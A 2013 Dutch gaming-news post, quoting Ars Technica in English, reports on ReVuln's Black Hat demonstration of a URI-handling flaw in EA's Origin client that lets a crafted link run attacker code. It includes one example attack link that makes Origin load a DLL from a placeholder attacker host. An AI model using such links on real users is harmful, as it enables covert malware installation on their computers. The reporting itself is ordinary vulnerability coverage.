Hackers nemen Origin accounts over door exploit

RDJ134 19 maart 2013 om 01:00 uur

Grote uitgevers hebben allemaal hun eigen platformen als Steam, U-Play en natuurlijk Electronic Arts met Origin. De verplichte client die je daar van moet gebruiken blijkt dus gevoelig te zijn voor een exploit die je hele PC door kwaadwillende hackers kan laten over nemen. Dit is gisteren aan het licht gekomen bij een Black Hat conferentie in Amsterdam, waarbij twee hackers een demonstratie gaven hoe het in zijn werk gaat. Electronic Arts heeft zoals je in het volledige artikel kan lezen al laten weten dat ze de zaak zeer serieus nemen en onderzoeken.


The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \ATTACKER_IPevil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Reageer